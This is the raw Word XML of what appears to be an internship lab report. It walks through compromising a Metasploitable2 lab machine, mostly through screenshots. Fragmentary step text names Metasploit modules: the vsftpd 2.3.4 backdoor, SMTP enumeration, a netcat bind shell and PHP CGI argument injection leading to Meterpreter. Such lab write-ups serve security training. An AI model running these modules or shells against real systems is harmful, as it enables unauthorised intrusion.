    <w:p w14:paraId="6ACB98A0" w14:textId="4ADC9B84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C47010E" w14:textId="3770DB0F" w:rsidR="004032A2" w:rsidRPr="00EA33BC" w:rsidRDefault="004032A2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4" w:name="_Hlk131186783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="00EA33BC"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="00EA33BC"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="00EA33BC"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="00EA33BC"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="00EA33BC"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 w:rsidR="00EA33BC"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4"/>
    <w:p w14:paraId="6EF3CF37" w14:textId="0DC6545C" w:rsidR="004032A2" w:rsidRDefault="005634F1" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005634F1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07A6CF22" wp14:editId="0D2634DA">
            <wp:extent cx="5410200" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="E:\Amit Internship\ft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mit Internship\ft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1650" w14:textId="41DDEC4C" w:rsidR="00EA33BC" w:rsidRPr="00244EB6" w:rsidRDefault="00EA33BC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BEF2B4" w14:textId="23467222" w:rsidR="00EA33BC" w:rsidRP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5" w:name="_Hlk131186862"/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bookmarkEnd w:id="5"/>
    <w:p w14:paraId="66F78CB5" w14:textId="1958F8F6" w:rsidR="00EA33BC" w:rsidRDefault="00400BCA" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400BCA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CDECBF" wp14:editId="4BFA4A75">
            <wp:extent cx="5731510" cy="3297029"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="E:\Amit Internship\ft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mit Internship\ft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465E" w14:textId="72A59F68" w:rsidR="00EA33BC" w:rsidRPr="00244EB6" w:rsidRDefault="00542EEA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6E14294" w14:textId="4F942A6E" w:rsidR="00542EEA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xt we look for the port 21 whether it is vulnerable to exploit using the command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p 21 –scrip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ul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9F54D5D" w14:textId="17941822" w:rsidR="00542EEA" w:rsidRDefault="002D2E68" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D2E68">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AE9254F" wp14:editId="59FC0EC4">
            <wp:extent cx="5731510" cy="2451942"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="3" name="Picture 3" descr="E:\Amit Internship\ft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mit Internship\ftp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ADBC" w14:textId="77777777" w:rsidR="00542EEA" w:rsidRDefault="00542EEA" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1726D703" w14:textId="119C2A7C" w:rsidR="00542EEA" w:rsidRPr="00244EB6" w:rsidRDefault="0072357E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2F168BCC" w14:textId="0ECCDDF5" w:rsidR="0072357E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vsfpd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exploit/unix/ftp/vsftpd_234_backdoo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A8E5694" w14:textId="77777777" w:rsidR="0072357E" w:rsidRDefault="0072357E" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AB5304" w14:textId="171F9190" w:rsidR="0072357E" w:rsidRDefault="00AD6465" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6465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23B73883" wp14:editId="5C8DB184">
            <wp:extent cx="5731510" cy="3145146"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="E:\Amit Internship\ft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mit Internship\ftp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7FE0" w14:textId="77777777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B1C141A" w14:textId="4AE414B0" w:rsidR="0072357E" w:rsidRPr="00244EB6" w:rsidRDefault="0072357E" w:rsidP="004032A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4EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STEP 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2681C9" w14:textId="024DAC81" w:rsidR="00084D05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the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followed by the ip address of the metasploitable machine</w:t>
      </w:r>
      <w:r w:rsidR="00084D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. Now when we see the options we see that the RHOSTS is set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F64C5" w14:textId="1E2EAC1D" w:rsidR="0072357E" w:rsidRDefault="00F80E7C" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F80E7C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5E435D14" wp14:editId="2FD47C08">
            <wp:extent cx="5731510" cy="3403770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="5" name="Picture 5" descr="E:\Amit Internship\ft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mit Internship\ftp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CE0F" w14:textId="4F995CAA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6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984CC8F" w14:textId="0BB0C329" w:rsidR="00084D05" w:rsidRP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have to for the payloads by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how payload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command and we have to use the payload name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payload/cmd/unix/interac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run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 metasploitable system is exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066B01E" w14:textId="2518974F" w:rsidR="00084D05" w:rsidRPr="00084D05" w:rsidRDefault="00340902" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00340902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50EA9F5" wp14:editId="6582A9AE">
            <wp:extent cx="5731510" cy="3932381"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="E:\Amit Internship\ft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mit Internship\ft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1DF0" w14:textId="173BA781" w:rsid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6695CEC3" w14:textId="1C29F2F2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1059FB2B" w14:textId="67055E83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407A2C7" w14:textId="43FC884E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4A05F446" w14:textId="6178F666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78918024" w14:textId="00EDE429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4156AEC5" w14:textId="357B860C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ED24E6D" w14:textId="7FAEDDD6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b) Exploiting Metasploit using SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281589E" w14:textId="5381837F" w:rsidR="00084D05" w:rsidRPr="00244EB6" w:rsidRDefault="005207BD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60E9262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4E132C36" w14:textId="4B400C4A" w:rsidR="00A77F20" w:rsidRDefault="00BA6236" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6236">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A0F37EE" wp14:editId="6C3513A8">
            <wp:extent cx="5372100" cy="3705225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7" name="Picture 7" descr="E:\Amit Internship\smt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mit Internship\smtp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75D5" w14:textId="614AD000" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1A6A5E" w14:textId="153E053A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306D9C8F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196AAED2" w14:textId="661C7037" w:rsidR="00A77F20" w:rsidRDefault="005C61FB" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C61FB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C9BC01E" wp14:editId="56A954CB">
            <wp:extent cx="5731510" cy="3248629"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="8" name="Picture 8" descr="E:\Amit Internship\smt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mit Internship\smtp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41FD" w14:textId="1F9BE3FD" w:rsidR="00A77F20" w:rsidRDefault="00A77F2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708F9AC" w14:textId="5E5F1DB7" w:rsidR="00A77F20" w:rsidRDefault="00A77F2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203D458" w14:textId="695F2261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38B8090C" w14:textId="7D2CF8A3" w:rsidR="00A77F20" w:rsidRPr="0072357E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bookmarkStart w:id="6" w:name="_Hlk131188602"/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smtp/smtp_enum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6"/>
    <w:p w14:paraId="01B6C22D" w14:textId="2549EEC0" w:rsidR="00A77F20" w:rsidRPr="00A77F20" w:rsidRDefault="005C61FB" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C61FB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4BD85D8D" wp14:editId="05BC565D">
            <wp:extent cx="5572125" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="9" name="Picture 9" descr="E:\Amit Internship\smt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mit Internship\smtp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4315" w14:textId="5F2C5825" w:rsidR="00A77F20" w:rsidRDefault="005C61FB" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C61FB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9FBF31" wp14:editId="4D1D988D">
            <wp:extent cx="5731510" cy="2939236"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="E:\Amit Internship\smt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mit Internship\smtp\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94D8" w14:textId="34AB65BA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068D524E" w14:textId="6096BBFF" w:rsidR="007C2C4B" w:rsidRPr="00F61CE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7" w:name="_Hlk131188754"/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>. Now in options we see that the RHOSTS is set.</w:t>
      </w:r>
      <w:r w:rsidR="00F61CEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then we give the command </w:t>
      </w:r>
      <w:r w:rsidR="00F61CEC"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 w:rsidR="00F61CEC"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7"/>
    <w:p w14:paraId="4F9CAF67" w14:textId="3F237940" w:rsidR="00A77F20" w:rsidRDefault="00530806" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530806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26EE93FA" wp14:editId="07FA2101">
            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="E:\Amit Internship\smt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mit Internship\smtp\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5C2B" w14:textId="308F263F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25246EA2" w14:textId="01B4F4FA" w:rsidR="007C2C4B" w:rsidRPr="007C2C4B" w:rsidRDefault="007C2C4B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Now open the new terminal window and run the command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nc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long with your ip address. We have exploited the metasploitable machine using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8836351" w14:textId="2C8FDEC2" w:rsidR="007C2C4B" w:rsidRDefault="00530806" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530806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5B36E736" wp14:editId="59C542BD">
            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="E:\Amit Internship\smt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mit Internship\smtp\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E80C" w14:textId="0C2F10D2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4A4F074" w14:textId="46A9536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8F17846" w14:textId="129FF7D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DF2ACFF" w14:textId="01E3829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0158711" w14:textId="24EB511A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930638" w14:textId="0D627FE4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6D116E3" w14:textId="6E67B9C2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C4E49A1" w14:textId="026B6C99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E31EB84" w14:textId="0C25212B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7761C8E" w14:textId="59323453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60E2B97" w14:textId="18AB3F16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C9FF2F3" w14:textId="2AD23BC8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c) Exploiting Metasploit using Blind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C3EDF" w14:textId="4A18FC3D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598D51FD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8" w:name="_Hlk131188410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8"/>
    <w:p w14:paraId="1339CC62" w14:textId="6D94CECD" w:rsidR="007C2C4B" w:rsidRDefault="00C23384" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23384">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35DC7E48" wp14:editId="58C952EC">
            <wp:extent cx="5731510" cy="3238836"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="E:\Amit Internship\blind shel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mit Internship\blind shell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8AF9" w14:textId="29527104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12CAB084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21EE1135" w14:textId="533A98D2" w:rsidR="007C2C4B" w:rsidRDefault="00C23384" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23384">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EE178A6" wp14:editId="53EF27A5">
            <wp:extent cx="5731510" cy="2869501"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="14" name="Picture 14" descr="E:\Amit Internship\blind shel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mit Internship\blind shell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A277" w14:textId="77777777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3BBD732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12CC02E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9E28529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2AB2D88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AC6610C" w14:textId="021B76DA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46DF010" w14:textId="64A83812" w:rsidR="004D1BD0" w:rsidRPr="004D1BD0" w:rsidRDefault="004D1BD0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ncad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, followed by your metasploitable ip address. Now you have exploited the metasploitable machine using blindshell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680716A" w14:textId="6AF87FA1" w:rsidR="004D1BD0" w:rsidRDefault="00C23384" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23384">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126AD9BD" wp14:editId="5374E1F0">
            <wp:extent cx="5731510" cy="2592059"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="E:\Amit Internship\blind shel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mit Internship\blind shell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A17C" w14:textId="18D0C813" w:rsidR="004D1BD0" w:rsidRDefault="004D1BD0" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797009A9" w14:textId="3BCE0DC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0A0E04A" w14:textId="247BE521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011ED9E" w14:textId="0AD59CF2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FF29B86" w14:textId="5945329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EB23BDF" w14:textId="26AFA74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BB09998" w14:textId="01013769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26B76CCC" w14:textId="65D583AF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B29B10B" w14:textId="1979DAB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C7C77C" w14:textId="753CE4AB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C1D6171" w14:textId="4E30067D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2375CC78" w14:textId="7931D00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6D6B515" w14:textId="77777777" w:rsidR="00244EB6" w:rsidRDefault="00244EB6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56F843C8" w14:textId="2BFEBE49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d) Exploiting Metasploit using HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E3EFB" w14:textId="27B80C50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STEP 1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AF919" w14:textId="77777777" w:rsidR="004D1BD0" w:rsidRPr="00EA33BC" w:rsidRDefault="004D1BD0" w:rsidP="004D1BD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ABD2A95" w14:textId="12EB6936" w:rsidR="004D1BD0" w:rsidRDefault="00F26906" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26906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00768AFD" wp14:editId="417DD1EE">
            <wp:extent cx="5019675" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="E:\Amit Internship\htt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mit Internship\http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0EF" w14:textId="77777777" w:rsidR="004D1BD0" w:rsidRDefault="004D1BD0" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8AA9FA" w14:textId="1DD7C25B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47DD6B" w14:textId="435D2008" w:rsidR="004A4454" w:rsidRDefault="004A4454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go to Firefox and go to this site </w:t>
      </w:r>
      <w:r w:rsidRPr="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“your ip address”/php/phpinfo.ph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. Here we get information about our php version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2FF69C" w14:textId="34E92E1B" w:rsidR="00F26906" w:rsidRPr="004A4454" w:rsidRDefault="00F26906" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26906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66BB1F65" wp14:editId="57085B1D">
            <wp:extent cx="5730218" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="E:\Amit Internship\http\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mit Internship\http\2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29" cy="9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6931" w14:textId="646E88AF" w:rsidR="004D1BD0" w:rsidRPr="007C2C4B" w:rsidRDefault="00114BAE" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114BAE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7364D57D" wp14:editId="0F5FACA2">
            <wp:extent cx="4010025" cy="4333875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="18" name="Picture 18" descr="E:\Amit Internship\http\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mit Internship\http\2(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2877" w14:textId="77777777" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5A2994" w14:textId="6560712F" w:rsidR="00A77F20" w:rsidRPr="00244EB6" w:rsidRDefault="004A4454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3562F637" w14:textId="4C609B75" w:rsidR="004A4454" w:rsidRPr="0072357E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http scanne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http/http_version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ich we get it around #168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14:paraId="3FE30A57" w14:textId="2154D7C4" w:rsidR="004A4454" w:rsidRDefault="00114BAE" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114BAE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5E080CA1" wp14:editId="30F272EA">
            <wp:extent cx="5731510" cy="2845389"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19" name="Picture 19" descr="E:\Amit Internship\http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Amit Internship\http\3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788D" w14:textId="5618485C" w:rsidR="004A4454" w:rsidRDefault="00114BAE" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114BAE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545122EE" wp14:editId="7C0DE3FB">
            <wp:extent cx="5731510" cy="2811360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="20" name="Picture 20" descr="E:\Amit Internship\http\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mit Internship\http\3(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B531" w14:textId="602F42CA" w:rsidR="005207BD" w:rsidRDefault="005207BD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C6A068C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866036E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1DB2784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053AF4B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4D33CCED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361710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197E20" w14:textId="5749906A" w:rsidR="004A4454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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC0E3B" w14:textId="5FB864BA" w:rsidR="004A4454" w:rsidRPr="004A4454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Now run it by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7252229C" w14:textId="27F0AFEF" w:rsidR="004A4454" w:rsidRPr="00E70875" w:rsidRDefault="00160072" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160072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5C22CCF0" wp14:editId="506DA045">
            <wp:extent cx="5731510" cy="2109907"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="21" name="Picture 21" descr="E:\Amit Internship\htt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Amit Internship\htt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1255" w14:textId="77777777" w:rsidR="00FB4756" w:rsidRDefault="00FB4756" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F4CD45" w14:textId="11730080" w:rsidR="00FB4756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03E6EE61" w14:textId="20671785" w:rsidR="004A4454" w:rsidRPr="00727F0C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In a new terminal window, g</w:t>
      </w:r>
      <w:r w:rsidR="004A4454">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">o for 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the access of root using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 command. Then use the command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earchsploit apache 2.2.8 | grep.php</w:t>
      </w:r>
      <w:r w:rsidR="00727F0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. From this we get to know the php version we are using.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60204CEB" w14:textId="1B1A33A4" w:rsidR="00727F0C" w:rsidRDefault="00160072" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160072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52E609D9" wp14:editId="533B6A9C">
            <wp:extent cx="5731510" cy="848734"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="22" name="Picture 22" descr="E:\Amit Internship\htt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Amit Internship\http\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6C23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3B02F4F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63BD73C6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44BAFE0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164E5369" w14:textId="760F4EB7" w:rsidR="00BA4D50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6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26600192" w14:textId="6F37017E" w:rsidR="00727F0C" w:rsidRPr="00727F0C" w:rsidRDefault="00727F0C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e search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.4.2. From there we ge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HP CGI argument injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use it. Then we look onto the options and s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89B29F7" w14:textId="49389C31" w:rsidR="00727F0C" w:rsidRDefault="003E00E6" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E00E6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7E79103A" wp14:editId="4AA10814">
            <wp:extent cx="5731510" cy="2805590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="23" name="Picture 23" descr="E:\Amit Internship\http\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Amit Internship\http\6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937F" w14:textId="2D05281C" w:rsidR="00727F0C" w:rsidRDefault="003E00E6" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E00E6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0C73824C" wp14:editId="4E614BF9">
            <wp:extent cx="5731510" cy="2989404"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="24" name="Picture 24" descr="E:\Amit Internship\http\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Amit Internship\http\6(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7F50" w14:textId="77777777" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43411343" w14:textId="058ADEEB" w:rsidR="00654C64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130E47D0" w14:textId="21C16D64" w:rsidR="008955CF" w:rsidRPr="008955CF" w:rsidRDefault="008955CF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run the command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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we g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Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and this is how we exploit metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2 machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> using http.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF11B6" w14:textId="561A4729" w:rsidR="00727F0C" w:rsidRDefault="002B689C" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B689C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0980D8DF" wp14:editId="266A435A">
            <wp:extent cx="5731510" cy="1017281"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
